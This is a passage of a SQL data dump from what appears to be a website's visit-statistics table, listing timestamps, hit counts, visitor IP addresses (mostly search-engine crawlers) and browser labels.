74614297,1,1,0,0,'207.46.13.75','other'),(463883,1574614713,1,1,0,0,'66.249.70.62','chrome'),(463884,1574614720,1,1,0,0,'66.249.70.33','chrome'),(463885,1574614917,17,17,0,0,'66.249.64.27','chrome'),(463886,1574614932,1,1,0,0,'207.46.13.234','other'),(463887,1574614941,13,13,0,0,'66.249.64.28','chrome'),(463888,1574614943,35,35,0,0,'66.249.64.26','chrome'),(463889,1574616139,1,1,0,0,'207.46.13.109','other'),(463890,1574616182,4,4,0,0,'66.249.70.62','chrome'),(463891,1574616470,1,1,0,0,'141.8.142.115','other'),(463892,1574616648,3,3,0,0,'66.249.64.28','chrome'),(463893,1574616703,2,2,0,0,'66.249.70.33','chrome'),(463894,1574616822,9,9,0,0,'66.249.64.26','chrome'),(463895,1574616883,1,1,0,0,'66.249.70.36','chrome'),(463896,1574617003,1,1,0,0,'141.8.188.25','other'),(463897,1574617073,2,2,0,0,'66.249.64.27','chrome'),(463898,1574617386,1,1,0,0,'185.53.79.197','opera'),(463899,1574618097,5,5,0,0,'66.249.64.26','chrome'),(463900,1574618171,4,4,0,0,'66.249.64.28','chrome'),(463901,1574618200,3,3,0,0,'66.249.70.36','chrome'),(463902,1574618222,4,4,0,0,'66.249.64.27','chrome'),(463903,1574618318,4,4,0,0,'66.249.70.62','chrome'),(463904,1574618717,7,7,0,0,'66.249.70.33','chrome'),(463905,1574619262,3,3,0,0,'66.249.64.27','chrome'),(463906,1574619286,1,1,0,0,'37.55.225.187','chrome'),(463907,1574619307,7,7,0,0,'66.249.64.26','chrome'),(463908,1574619361,1,1,0,0,'141.8.142.2','other'),(463909,1574619363,3,3,0,0,'66.249.64.28','chrome'),(463910,1574619393,1,1,0,0,'66.249.70.36','chrome'),(463911,1574619811,1,1,0,0,'8.29.198.26','other'),(463912,1574620279,1,1,0,0,'66.249.64.27','chrome'),(463913,1574620341,1,1,0,0,'207.46.13.109','other'),(463914,1574621142,1,1,0,0,'8.29.198.26','other'),(463915,1574621481,2,2,0,0,'66.249.64.28','chrome'),(463916,1574621613,5,5,0,0,'66.249.64.27','chrome'),(463917,1574621940,8,8,0,0,'31.13.127.3','other'),(463918,1574621941,5,5,0,0,'31.13.127.20','other'),(463935,1574621942,4,4,0,0,'31.13.127.4','other'),(463942,1574621943,2,2,0,0,'31.13.127.13','other'),(463954,1574621944,2,2,0,0,'31.13.127.9','other'),(463957,1574621952,1,1,0,0,'31.13.127.5','other'),(463958,1574622214,2,2,0,0,'66.249.64.26','chrome'),(463959,1574622263,1,1,0,0,'66.249.70.62','chrome'),(463960,1574622448,1,1,0,0,'66.249.70.36','chrome'),(463961,1574622553,1,1,0,0,'66.249.64.28','chrome'),(463962,1574622669,3,3,0,0,'66.249.64.27','chrome'),(463963,1574623303,1,1,0,0,'37.9.113.177','other'),(463964,1574623427,1,1,0,0,'207.46.13.208','other'),(463965,1574623467,3,3,0,0,'66.249.70.33','chrome'),(463966,1574623483,1,1,0,0,'66.249.70.62','chrome'),(463967,1574623485,2,2,0,0,'66.249.64.28','chrome'),(463968,1574623493,9,9,0,0,'66.249.64.26','chrome'),(463969,1574623590,4,4,0,0,'66.249.70.36','chrome'),(463970,1574623643,4,4,0,0,'66.249.64.27','chrome'),(463971,1574624367,1,1,0,0,'207.46.13.109','other'),(463972,1574624524,3,3,0,0,'66.249.64.28','chrome'),(463973,1574624531,4,4,0,0,'66.249.70.62','chrome'),(463974,1574624627,3,3,0,0,'66.249.64.26','chrome'),(463975,1574624710,3,3,0,0,'66.249.70.36','chrome'),(463976,1574624855,1,1,0,0,'66.249.70.33','chrome'),(463977,1574624868,1,1,0,0,'66.249.64.27','chrome'),(463978,1574625396,1,1,0,0,'207.46.13.208','other'),(463979,1574625644,1,1,0,0,'66.249.64.28','chrome'),(463980,1574626639,2,2,0,0,'157.55.39.214','other'),(463981,1574627057,3,3,0,0,'66.249.70.62','chrome'),(463982,1574627092,19,19,0,0,'66.249.64.26','chrome'),(463983,1574627101,5,5,0,0,'66.249.70.33','chrome'),(463984,1574627247,3,3,0,0,'66.249.64.28','chrome'),(463985,1574627363,4,4,0,0,'66.249.64.27','chrome'),(463986,1574628747,3,3,0,0,'66.249.64.26','chrome'),(463987,1574628751,1,1,0,0,'66.249.70.36','chrome'),(463988,1574628756,2,2,0,0,'66.249.64.27','chrome'),(463989,1574629308,2,2,0,0,'95.91.15.173','other'),(463990,1574629600,1,1,0,0,'157.55.39.86','other'),(463991,1574629855,1,1,0,0,'176.124.238.249','firefox'),(463992,1574629979,2,2,0,0,'66.249.64.27','chrome'),(463993,1574630675,1,1,0,0,'8.29.198.27','other'),(463994,1574630793,3,3,0,0,'66.249.70.36','chrome'),(463995,1574630922,3,3,0,0,'66.249.64.27','chrome'),(463996,1574630949,3,3,0,0,'66.249.70.62','chrome'),(463997,1574630985,6,6,0,0,'66.249.64.26','chrome'),(463998,1574630987,1,1,0,0,'66.249.64.28','chrome'),(463999,1574631027,1,1,0,0,'66.249.70.33','chrome'),(464000,1574631969,1,1,0,0,'213.180.203.37','other'),(464001,1574631990,1,1,0,0,'8.29.198.26','other'),(464002,1574632271,1,1,0,0,'66.249.64.27','chrome'),(464003,1574632337,1,1,0,0,'88.154.167.13','chrome'),(464004,1574633356,1,1,0,0,'66.249.64.27','chrome'),(464005,1574633913,5,5,0,0,'66.249.64.26','chrome'),(464006,1574634616,7,7,0,0,'66.249.64.27','chrome'),(464007,1574634732,2,2,0,0,'66.249.70.62','chrome'),(464008,1574634871,1,1,0,0,'207.46.13.208','other'),(464009,1574634884,1,1,0,0,'66.249.64.26','chrome'),(464010,1574634893,1,1,0,0,'188.163.35.143','other'),(464011,1574635794,1,1,0,0,'207.46.13.208','other'),(464012,1574636152,1,1,0,0,'66.249.64.26','chrome'),(464013,1574637309,1,1,0,0,'66.249.64.28','chrome'),(464014,1574637360,4,4,0,0,'66.249.64.26','chrome'),(464015,1574638008,1,1,0,0,'66.249.64.27','chrome'),(464016,1574638355,1,1,0,0,'77.111.247.157','chrome'),(464017,1574638634,1,1,0,0,'66.249.64.26','chrome'),(464018,1574639175,2,2,0,0,'207.46.13.208','other'),(464019,1574640252,1,1,0,0,'141.8.142.119','other'),(464020,1574641264,1,1,0,0,'157.55.39.86','other'),(464021,1574641526,1,1,0,0,'8.29.198.27','other'),(464022,1574642073,1,1,0,0,'207.46.13.208','other'),(464023,1574642350,1,1,0,0,'66.249.70.36','chrome'),(464024,1574642486,2,2,0,0,'66.249.64.28','chrome'),(464025,1574642847,1,1,0,0,'8.29.198.27','other'),(464026,1574643889,1,1,0,0,'66.249.64.27','chrome'),(464027,1574647508,5,5,0,0,'66.249.64.26','chrome'),(464028,1574647509,1,1,0,0,'66.249.64.27','chrome'),(464029,1574647718,1,1,0,0,'213.180.203.37','other'),(464030,1574647815,1,1,0,0,'207.46.13.171','other'),(464031,1574648875,1,1,0,0,'66.249.70.33','chrome'),(464032,1574649423,3,3,0,0,'66.249.64.28','chrome'),(464033,1574649424,1,1,0,0,'88.154.177.62','chrome'),(464034,1574649441,3,3,0,0,'66.249.64.27','chrome'),(464035,1574649459,2,2,0,0,'66.249.64.26','chrome'),(464036,1574649656,1,1,0,0,'66.249.70.36','chrome'),(464037,1574649807,1,1,0,0,'66.249.70.33','chrome'),(464038,1574650481,1,1,0,0,'141.8.142.115','other'),(464039,1574650610,1,1,0,0,'157.55.39.174','other'),(464040,1574651490,1,1,0,0,'66.249.64.28','chrome'),(464041,1574652374,1,1,0,0,'66.249.64.26','chrome'),(464042,1574652376,1,1,0,0,'8.29.198.26','other'),(464043,1574653711,1,1,0,0,'8.29.198.26','other'),(464044,1574654691,5,5,0,0,'66.249.64.28','chrome'),(464045,1574654694,3,3,0,0,'66.249.70.62','chrome'),(464046,1574654804,6,6,0,0,'66.249.64.27','chrome'),(464047,1574654899,3,3,0,0,'66.249.64.26','chrome'),(464048,1574655081,1,1,0,0,'141.8.142.161','other'),(464049,1574657570,1,1,0,0,'66.249.70.62','chrome'),(464050,1574658136,1,1,0,0,'66.249.70.33','chrome'),(464051,1574658145,1,1,0,0,'66.249.64.27','chrome'),(464052,1574658176,2,2,0,0,'66.249.64.26','chrome'),(464053,1574658283,2,2,0,0,'157.55.39.174','other'),(464054,1574658901,1,1,0,0,'66.249.70.36','chrome'),(464055,1574659016,2,2,0,0,'66.249.64.28','chrome'),(464056,1574659053,2,2,0,0,'66.249.64.27','chrome'),(464057,1574660150,1,1,0,0,'213.180.203.44','other'),(464058,1574660475,2,2,0,0,'66.249.64.27','chrome'),(464059,1574661608,1,1,0,0,'157.55.39.174','other'),(464060,1574661717,1,1,0,0,'66.249.64.27','chrome'),(464061,1574663222,1,1,0,0,'8.29.198.26','other'),(464062,1574663777,1,1,0,0,'213.180.203.37','other'),(464063,1574664562,1,1,0,0,'8.29.198.25','other'),(464064,1574666967,1,1,0,0,'207.46.13.204','other'),(464065,1574667036,1,1,0,0,'66.249.64.26','chrome'),(464066,1574668085,1,1,0,0,'31.13.127.4','other'),(464067,1574668086,1,1,0,0,'31.13.127.19','other'),(464068,1574668087,1,1,0,0,'31.13.127.13','other'),(464070,1574669709,2,2,0,0,'207.46.13.204','other'),(464071,1574670009,2,2,0,0,'207.46.13.171','other'),(464072,1574670012,2,2,0,0,'157.55.39.174','other'),(464073,1574670048,1,1,0,0,'207.46.13.223','other'),(464074,1574670079,1,1,0,0,'178.251.109.168','chrome'),(464075,1574670356,1,1,0,0,'94.179.246.61','firefox'),(464076,1574670759,1,1,0,0,'174.21.62.119','other'),(464077,1574670793,1,1,0,0,'66.249.64.27','chrome'),(464078,1574671700,1,1,0,0,'174.21.62.119','other'),(464079,1574671999,1,1,0,0,'157.55.39.174','other'),(464080,1574672068,1,1,0,0,'207.46.13.204','other'),(464081,1574672439,1,1,0,0,'66.249.64.28','chrome'),(464082,1574672646,2,2,0,0,'77.109.57.228','chrome'),(464083,1574672943,1,1,0,0,'157.55.39.174','other'),(464084,1574674083,1,1,0,0,'8.29.198.27','other'),(464085,1574674884,1,1,0,0,'91.196.178.73','chrome'),(464086,1574674927,1,1,0,0,'18.189.178.68','chrome'),(464087,1574675426,1,1,0,0,'8.29.198.25','other'),(464088,1574675580,1,1,0,0,'157.55.39.174','other'),(464089,1574675667,1,1,0,0,'66.249.64.28','chrome'),(464090,1574676860,2,2,0,0,'207.46.13.223','other'),(464091,1574677200,1,1,0,0,'157.55.39.174','other'),(464092,1574678198,1,1,0,0,'94.153.96.158','chrome'),(464093,1574678839,1,1,0,0,'207.46.13.204','other'),(464094,1574680329,1,1,0,0,'178.92.154.174','chrome'),(464095,1574681936,1,1,0,0,'109.74.154.72','chrome'),(464096,1574682354,1,1,0,0,'66.249.64.27','chrome'),(464097,1574682456,1,1,0,0,'91.196.178.164','chrome'),(464098,1574682835,1,1,0,0,'66.249.64.26','chrome'),(464099,1574682945,1,1,0,0,'207.46.13.197','other'),(464100,1574683012,1,1,0,0,'157.55.39.116','other'),(464101,1574683033,1,1,0,0,'207.46.13.204','other'),(464102,1574683543,2,2,0,0,'5.9.61.232','other'),(464103,1574683595,1,1,0,0,'66.249.70.36','chrome'),(464104,1574683921,1,1,0,0,'13.66.139.0','other'),(464105,1574684936,1,1,0,0,'8.29.198.25','other'),(464106,1574686313,1,1,0,0,'8.29.198.26','other'),(464107,1574687578,2,2,0,0,'31.13.127.25','other'),(464108,1574687580,1,1,0,0,'31.13.127.7','other'),(464110,1574687639,1,1,0,0,'31.13.127.34','other'),(464111,1574687640,1,1,0,0,'31.13.127.27','other'),(464112,1574687739,1,1,0,0,'91.196.178.90','chrome'),(464113,1574688846,1,1,0,0,'207.46.13.197','other'),(464114,1574689458,1,1,0,0,'66.249.64.27','chrome'),(464115,1574689663,1,1,0,0,'66.249.64.26','chrome'),(464116,1574689938,1,1,0,0,'91.196.178.187','chrome'),(464117,1574692319,1,1,0,0,'66.249.64.28','chrome'),(464118,1574692829,1,1,0,0,'91.196.178.187','chrome'),(464119,1574692892,1,1,0,0,'91.196.178.79','firefox'),(464120,1574693083,1,1,0,0,'91.196.178.90','chrome'),(464121,1574693187,2,2,0,0,'66.249.64.27','chrome'),(464122,1574693231,1,1,0,0,'91.196.178.164','chrome'),(464123,1574693543,2,2,0,0,'207.46.13.197','other'),(464124,1574693595,2,2,0,0,'66.249.64.28','chrome'),(464125,1574693800,1,1,0,0,'157.55.39.116','other'),(464126,1574695042,2,2,0,0,'207.46.13.223','other'),(464127,1574695151,1,1,0,0,'157.55.39.116','other'),(464128,1574695197,1,1,0,0,'91.196.178.83','firefox'),(464129,1574695813,1,1,0,0,'8.29.198.27','other'),(464130,1574697245,1,1,0,0,'8.29.198.26','other'),(464131,1574698581,1,1,0,0,'5.45.207.49','other'),(464132,1574699644,2,2,0,0,'157.55.39.116','other'),(464133,1574700065,1,1,0,0,'207.46.13.223','other'),(464134,1574700241,1,1,0,0,'141.8.188.25','other'),(464135,1574702159,2,2,0,0,'192.99.4.163','other'),(464136,1574702161,2,2,0,0,'192.99.36.166','other'),(464137,1574702229,2,2,0,0,'192.99.14.130','other'),(464138,1574703712,1,1,0,0,'157.55.39.116','other'),(464139,1574704633,1,1,0,0,'207.46.13.223','other'),(464140,1574704659,1,1,0,0,'66.249.64.28','chrome'),(464141,1574704919,1,1,0,0,'157.55.39.116','other'),(464142,1574706334,1,1,0,0,'207.46.13.100','other'),(464143,1574706386,1,1,0,0,'138.246.253.5','chrome'),(464144,1574706658,1,1,0,0,'91.196.178.177','other'),(464145,1574706690,1,1,0,0,'8.29.198.27','other'),(464146,1574706867,2,2,0,0,'66.249.64.27','chrome'),(464147,1574708140,1,1,0,0,'8.29.198.25','other'),(464148,1574708411,1,1,0,0,'157.55.39.137','other'),(464149,1574710583,1,1,0,0,'141.8.188.25','other'),(464150,1574711550,2,2,0,0,'31.13.127.1','other'),(464151,1574711552,1,1,0,0,'31.13.127.11','other'),(464153,1574711558,1,1,0,0,'141.8.142.50','other'),(464154,1574711729,1,1,0,0,'141.8.142.2','other'),(464155,1574712512,1,1,0,0,'66.249.64.27','chrome'),(464156,1574712871,1,1,0,0,'178.154.200.71','other'),(464157,1574712927,1,1,0,0,'141.8.132.12','other'),(464158,1574713159,2,2,0,0,'95.213.141.126','opera'),(464159,1574713180,1,1,0,0,'91.196.178.186','chrome'),(464160,1574714212,1,0,1,0,'66.249.70.62',''),(464161,1574714359,1,1,0,0,'95.108.181.103','other'),(464162,1574714451,1,1,0,0,'66.249.64.27','chrome'),(464163,1574714510,1,1,0,0,'66.249.64.28','chrome'),(464164,1574714664,1,1,0,0,'37.9.113.33','other'),(464165,1574714898,1,1,0,0,'95.216.96.254','other'),(464166,1574714930,1,1,0,0,'157.55.39.137','other'),(464167,1574715421,1,1,0,0,'54.245.137.248','chrome'),(464168,1574716198,1,1,0,0,'157.55.39.137','other'),(464169,1574717268,1,1,0,0,'91.196.178.136','chrome'),(464170,1574717373,1,1,0,0,'37.9.113.177','other'),(464171,1574717545,1,1,0,0,'8.29.198.27','other'),(464172,1574718853,1,1,0,0,'141.8.188.20','other'),(464173,1574719010,1,1,0,0,'8.29.198.27','other'),(464174,1574721707,1,1,0,0,'66.249.70.36','chrome'),(464175,1574722762,2,2,0,0,'5.9.98.234','other'),(464176,1574722950,1,1,0,0,'66.249.64.26','chrome'),(464177,1574723015,1,1,0,0,'176.36.21.189','chrome'),(464178,1574723287,1,1,0,0,'66.249.64.27','chrome'),(464179,1574723515,1,1,0,0,'66.249.64.28','chrome'),(464180,1574723737,1,1,0,0,'213.180.203.37','other'),(464181,1574724608,2,2,0,0,'66.249.64.26','chrome'),(464182,1574725320,1,1,0,0,'66.249.64.27','chrome'),(464183,1574725843,1,1,0,0,'213.180.203.44','other'),(464184,1574726354,1,1,0,0,'207.46.13.100','other'),(464185,1574726765,1,1,0,0,'213.180.203.44','other'),(464186,1574728042,1,1,0,0,'66.249.64.28','chrome'),(464187,1574728416,1,1,0,0,'8.29.198.26','other'),(464188,1574729899,1,1,0,0,'8.29.198.27','other'),(464189,1574730889,1,1,0,0,'62.48.210.2','chrome'),(464190,1574731175,1,1,0,0,'101.4.60.124','chrome'),(464191,1574731915,1,1,0,0,'209.17.96.154','other'),(464192,1574732833,2,2,0,0,'213.180.203.44','other'),(464193,1574734415,1,1,0,0,'66.249.64.26','chrome'),(464194,1574735272,1,1,0,0,'141.8.132.2','other'),(464195,1574735323,1,1,0,0,'66.249.70.48','chrome'),(464196,1574736030,1,1,0,0,'95.108.181.103','other'),(464197,1574736683,1,1,0,0,'207.46.13.100','other'),(464198,1574737487,1,1,0,0,'213.180.203.44','other'),(464199,1574738554,1,1,0,0,'213.180.203.37','other'),(464200,1574739276,1,1,0,0,'8.29.198.26','other'),(464201,1574740764,1,1,0,0,'8.29.198.25','other'),(464202,1574741275,1,1,0,0,'66.249.64.26','chrome'),(464203,1574741933,1,1,0,0,'207.46.13.193','other'),(464204,1574742416,2,2,0,0,'157.55.39.80','other'),(464205,1574742431,1,1,0,0,'213.180.203.37','other'),(464206,1574742669,1,1,0,0,'178.154.200.33','other'),(464207,1574743701,1,1,0,0,'213.180.203.44','other'),(464208,1574744944,1,1,0,0,'213.180.203.44','other'),(464209,1574746237,1,1,0,0,'157.55.39.82','other'),(464210,1574746735,1,1,0,0,'128.124.252.22','chrome'),(464211,1574746987,1,1,0,0,'213.180.203.44','other'),(464212,1574750139,1,1,0,0,'8.29.198.27','other'),(464213,1574750656,1,1,0,0,'213.180.203.44','other'),(464214,1574751036,1,1,0,0,'91.196.178.164','chrome'),(464215,1574751205,1,1,0,0,'207.46.13.150','other'),(464216,1574751504,1,0,1,0,'66.249.70.33',''),(464217,1574751645,1,1,0,0,'8.29.198.27','other'),(464218,1574751690,1,1,0,0,'213.180.203.37','other'),(464219,1574753313,1,1,0,0,'207.46.13.150','other'),(464220,1574753985,1,0,1,0,'66.249.70.33',''),(464221,1574754126,1,1,0,0,'46.149.91.152','chrome'),(464222,1574754235,1,1,0,0,'46.133.240.229','chrome'),(464223,1574754888,1,1,0,0,'207.46.13.150','other'),(464224,1574755493,1,0,1,0,'66.249.64.28',''),(464225,1574755538,1,1,0,0,'31.13.127.3','other'),(464226,1574755539,1,1,0,0,'31.13.127.12','other'),(464229,1574756118,1,0,1,0,'66.249.64.26',''),(464230,1574756324,1,1,0,0,'207.46.13.193','other'),(464231,1574756526,1,1,0,0,'37.73.163.31','chrome'),(464232,1574756590,1,1,0,0,'157.55.39.82','other'),(464233,1574756845,1,1,0,0,'157.55.39.80','other'),(464234,1574756903,1,1,0,0,'91.209.11.236','other'),(464235,1574756934,1,1,0,0,'66.249.64.26','chrome'),(464236,1574757625,1,1,0,0,'66.249.70.36','chrome'),(464237,1574757851,3,3,0,0,'66.249.64.28','chrome'),(464238,1574758412,1,1,0,0,'66.249.64.26','chrome'),(464239,1574759067,2,2,0,0,'66.249.64.27','chrome'),(464240,1574759515,1,1,0,0,'141.8.142.161','other'),(464241,1574759744,2,2,0,0,'66.249.64.26','chrome'),(464242,1574760238,1,1,0,0,'66.249.70.36','chrome'),(464243,1574760312,2,2,0,0,'66.249.64.28','chrome'),(464244,1574760614,1,1,0,0,'91.196.178.90','chrome'),(464245,1574760784,2,2,0,0,'195.24.148.186','chrome'),(464246,1574760820,1,1,0,0,'176.111.33.18','firefox'),(464247,1574760990,1,1,0,0,'8.29.198.26','other'),(464248,1574761111,1,1,0,0,'3.228.23.10','chrome'),(464249,1574761346,1,1,0,0,'195.162.90.62','chrome'),(464250,1574761348,1,1,0,0,'66.249.64.27','chrome'),(464251,1574761662,1,1,0,0,'207.46.13.150','other'),(464252,1574761707,1,1,0,0,'91.196.159.42','chrome'),(464253,1574762261,1,1,0,0,'91.196.178.90','chrome'),(464254,1574762432,1,1,0,0,'212.1.124.210','chrome'),(464255,1574762506,1,1,0,0,'8.29.198.25','other'),(464256,1574762737,1,1,0,0,'66.249.64.26','chrome'),(464257,1574763420,1,1,0,0,'88.154.235.74','chrome'),(464258,1574763692,2,2,0,0,'213.180.203.44','other'),(464259,1574763825,1,1,0,0,'213.180.203.37','other'),(464260,1574763874,1,1,0,0,'157.55.39.80','other'),(464261,1574763948,1,1,0,0,'66.249.64.27','chrome'),(464262,1574764014,1,1,0,0,'91.196.178.164','chrome'),(464263,1574765752,1,1,0,0,'66.249.70.36','chrome'),(464264,1574765774,1,1,0,0,'141.8.142.50','other'),(464265,1574765949,1,1,0,0,'178.95.246.57','chrome'),(464266,1574766263,2,2,0,0,'66.249.64.27','chrome'),(464267,1574766309,1,1,0,0,'66.249.64.26','chrome'),(464268,1574766940,1,1,0,0,'109.74.154.72','chrome'),(464269,1574767097,1,1,0,0,'141.8.132.19','other'),(464270,1574767911,1,1,0,0,'66.249.70.62','chrome'),(464271,1574768042,1,1,0,0,'157.55.39.55','other'),(464272,1574768242,1,1,0,0,'141.8.132.12','other'),(464273,1574768252,1,1,0,0,'95.108.181.104','other'),(464274,1574769997,1,1,0,0,'91.196.178.164','chrome'),(464275,1574770431,1,1,0,0,'213.180.203.44','other'),(464276,1574770447,1,1,0,0,'213.180.203.37','other'),(464277,1574770457,1,1,0,0,'157.55.39.80','other'),(464278,1574770565,1,1,0,0,'141.8.142.2','other'),(464279,1574771862,1,1,0,0,'8.29.198.25','other'),(464280,1574771930,1,1,0,0,'91.196.177.227','chrome'),(464281,1574772755,2,2,0,0,'141.8.142.2','other'),(464282,1574773183,1,1,0,0,'91.209.11.236','other'),(464283,1574773368,1,1,0,0,'8.29.198.27','other'),(464284,1574774134,2,2,0,0,'89.163.242.239','other'),(464285,1574774251,1,1,0,0,'91.196.178.132','firefox'),(464286,1574774463,1,1,0,0,'157.55.39.80','other'),(464287,1574774620,1,1,0,0,'213.180.203.37','other'),(464288,1574775686,1,1,0,0,'207.46.13.173','other'),(464289,1574775725,1,1,0,0,'207.46.13.150','other'),(464290,1574775767,2,2,0,0,'157.55.39.55','other'),(464291,1574776897,3,3,0,0,'213.180.203.44','other'),(464292,1574776923,1,1,0,0,'141.8.142.2','other'),(464293,1574777051,1,1,0,0,'92.52.171.179','chrome'),(464294,1574777058,1,1,0,0,'91.196.177.228','chrome'),(464295,1574777562,1,1,0,0,'91.196.178.90','chrome'),(464296,1574777583,1,1,0,0,'157.55.39.55','other'),(464297,1574777639,1,1,0,0,'207.46.13.31','other'),(464298,1574778718,2,2,0,0,'207.46.13.31','other'),(464299,1574779243,1,1,0,0,'91.196.178.73','firefox'),(464300,1574779321,1,1,0,0,'207.46.13.173','other'),(464301,1574779903,1,1,0,0,'213.180.203.44','other'),(464302,1574780862,1,1,0,0,'31.148.23.98','chrome'),(464303,1574782273,1,1,0,0,'207.46.13.150','other'),(464304,1574782496,1,1,0,0,'66.249.64.26','chrome'),(464305,1574782744,1,1,0,0,'87.250.224.90','chrome'),(464306,1574782749,1,1,0,0,'8.29.198.26','other'),(464307,1574783290,1,1,0,0,'95.132.27.75','chrome'),(464308,1574783454,1,1,0,0,'91.196.178.189','chrome'),(464309,1574784078,1,1,0,0,'207.46.13.173','other'),(464310,1574784215,1,1,0,0,'213.180.203.44','other'),(464311,1574784251,1,1,0,0,'8.29.198.26','other'),(464312,1574785182,1,1,0,0,'213.180.203.44','other'),(464313,1574785385,1,1,0,0,'66.249.64.27','chrome'),(464314,1574785529,1,1,0,0,'60.191.38.77','firefox'),(464315,1574786405,1,1,0,0,'207.46.13.31','other'),(464316,1574786452,1,1,0,0,'213.180.203.37','other'),(464317,1574786466,1,1,0,0,'66.249.64.27','chrome'),(464318,1574786571,2,2,0,0,'66.129.102.52','chrome'),(464319,1574787303,2,2,0,0,'213.180.203.44','other'),(464320,1574787533,1,1,0,0,'207.46.13.173','other'),(464321,1574789006,1,1,0,0,'66.249.64.26','chrome'),(464322,1574790323,1,1,0,0,'66.249.64.28','chrome'),(464323,1574790512,1,1,0,0,'213.180.203.37','other'),(464324,1574791009,1,1,0,0,'157.55.39.55','other'),(464325,1574791692,1,1,0,0,'66.249.64.28','chrome'),(464326,1574791946,1,1,0,0,'93.73.173.105','chrome'),(464327,1574793663,1,1,0,0,'8.29.198.25','other'),(464328,1574793697,1,1,0,0,'207.46.13.31','other'),(464329,1574793702,1,1,0,0,'141.8.142.2','other'),(464330,1574793982,2,2,0,0,'69.30.213.138','other'),(464331,1574794655,1,1,0,0,'207.46.13.31','other'),(464332,1574794907,1,1,0,0,'213.180.203.44','other'),(464333,1574794929,1,1,0,0,'141.8.132.12','other'),(464334,1574794936,1,1,0,0,'213.180.203.37','other'),(464335,1574794943,2,2,0,0,'207.46.13.173','other'),(464336,1574795138,1,1,0,0,'8.29.198.27','other'),(464337,1574795234,1,1,0,0,'141.8.183.33','other'),(464338,1574798073,1,1,0,0,'37.214.201.113','chrome'),(464339,1574798446,1,1,0,0,'141.8.142.2','other'),(464340,1574799483,1,1,0,0,'69.171.251.4','other'),(464341,1574799484,1,1,0,0,'69.171.251.33','other'),(464344,1574799759,1,1,0,0,'5.45.207.65','other'),(464345,1574800015,1,1,0,0,'141.8.132.19','other'),(464346,1574800697,1,1,0,0,'69.171.251.35','other'),(464347,1574800698,1,1,0,0,'69.171.251.29','other'),(464348,1574801039,1,1,0,0,'157.55.39.55','other'),(464349,1574801470,1,1,0,0,'194.44.97.57','chrome'),(464350,1574802985,1,1,0,0,'13.66.139.0','other'),(464351,1574803087,1,1,0,0,'157.55.39.66','other'),(464352,1574804311,2,2,0,0,'213.180.203.44','other'),(464353,1574804568,1,1,0,0,'8.29.198.26','other'),(464354,1574805574,1,1,0,0,'213.180.203.37','other'),(464355,1574805578,1,1,0,0,'178.154.200.33','other'),(464356,1574806019,1,1,0,0,'8.29.198.25','other'),(464357,1574807396,1,1,0,0,'87.250.224.90','other'),(464358,1574809079,1,1,0,0,'207.46.13.170','other'),(464359,1574809312,1,1,0,0,'213.180.203.44','other'),(464360,1574809814,1,1,0,0,'66.249.64.27','chrome'),(464361,1574810648,1,1,0,0,'213.180.203.37','other'),(464362,1574811858,2,2,0,0,'213.180.203.44','other'),(464363,1574811910,1,1,0,0,'213.180.203.37','other'),(464364,1574812818,1,1,0,0,'207.46.13.170','other'),(464365,1574812992,1,1,0,0,'178.154.200.33','other'),(464366,1574813246,1,1,0,0,'157.55.39.66','other'),(464367,1574814246,4,4,0,0,'213.180.203.44','other'),(464368,1574814699,1,1,0,0,'66.249.64.26','chrome'),(464369,1574815354,1,1,0,0,'66.249.64.27','chrome'),(464370,1574815434,1,1,0,0,'207.46.13.127','other'),(464371,1574815446,1,1,0,0,'8.29.198.26','other'),(464372,1574815494,2,2,0,0,'144.76.71.176','other'),(464373,1574816250,1,1,0,0,'66.249.64.28','chrome'),(464374,1574816445,1,1,0,0,'51.68.152.26','chrome'),(464375,1574816888,1,1,0,0,'8.29.198.26','other'),(464376,1574817731,1,1,0,0,'213.180.203.37','other'),(464377,1574818554,1,1,0,0,'91.206.14.227','other'),(464378,1574818903,1,1,0,0,'213.180.203.37','other'),(464379,1574819618,1,1,0,0,'34.213.180.103','other'),(464380,1574820499,2,2,0,0,'66.249.64.30','chrome'),(464381,1574821196,1,1,0,0,'5.45.207.65','other'),(464382,1574821685,3,3,0,0,'66.249.64.28','chrome'),(464383,1574821982,1,1,0,0,'207.46.13.16','other'),(464384,1574823297,1,1,0,0,'66.249.70.62','chrome'),(464385,1574823610,2,2,0,0,'66.249.64.26','chrome'),(464386,1574824013,1,1,0,0,'66.249.70.36','chrome'),(464387,1574824761,1,1,0,0,'141.8.142.2','other'),(464388,1574825245,2,2,0,0,'66.249.64.27','chrome'),(464389,1574825851,1,1,0,0,'66.249.64.28','chrome'),(464390,1574825874,2,2,0,0,'213.180.203.44','other'),(464391,1574826225,1,1,0,0,'66.249.64.26','chrome'),(464392,1574826340,1,1,0,0,'8.29.198.27','other'),(464393,1574826615,1,1,0,0,'66.249.70.33','chrome'),(464394,1574827473,5,5,0,0,'66.249.64.26','chrome'),(464395,1574827663,2,2,0,0,'66.249.70.62','chrome'),(464396,1574827776,1,1,0,0,'8.29.198.26','other'),(464397,1574827939,1,1,0,0,'157.55.39.66','other'),(464398,1574828199,1,1,0,0,'213.180.203.37','other'),(464399,1574828279,3,3,0,0,'66.249.64.27','chrome'),(464400,1574828402,1,1,0,0,'213.180.203.44','other'),(464401,1574828670,1,1,0,0,'157.55.39.199','other'),(464402,1574828690,1,1,0,0,'66.249.64.26','chrome'),(464403,1574828695,1,1,0,0,'185.112.82.235','chrome'),(464404,1574828980,2,2,0,0,'66.249.64.28','chrome'),(464405,1574829397,2,2,0,0,'141.8.142.2','other'),(464406,1574829405,1,1,0,0,'213.180.203.37','other'),(464407,1574829408,1,1,0,0,'213.180.203.44','other'),(464408,1574829555,1,1,0,0,'66.249.64.27','chrome'),(464409,1574829681,1,1,0,0,'178.154.200.33','other'),(464410,1574830439,1,1,0,0,'66.249.70.62','chrome'),(464411,1574830481,3,3,0,0,'66.249.64.27','chrome'),(464412,1574830751,1,1,0,0,'213.180.203.37','other'),(464413,1574831092,2,2,0,0,'66.249.64.28','chrome'),(464414,1574831286,1,1,0,0,'91.196.178.133','firefox'),(464415,1574831392,1,1,0,0,'66.249.70.62','chrome'),(464416,1574831841,1,1,0,0,'213.180.203.44','other'),(464417,1574832142,1,1,0,0,'176.36.21.189','chrome'),(464418,1574832324,1,1,0,0,'66.249.64.27','chrome'),(464419,1574832387,1,1,0,0,'66.249.70.33','chrome'),(464420,1574832414,4,4,0,0,'66.249.64.26','chrome'),(464421,1574832498,2,2,0,0,'66.249.64.28','chrome'),(464422,1574834088,1,1,0,0,'207.46.13.16','other'),(464423,1574834152,3,3,0,0,'66.249.64.26','chrome'),(464424,1574834316,1,1,0,0,'213.180.203.44','other'),(464425,1574835054,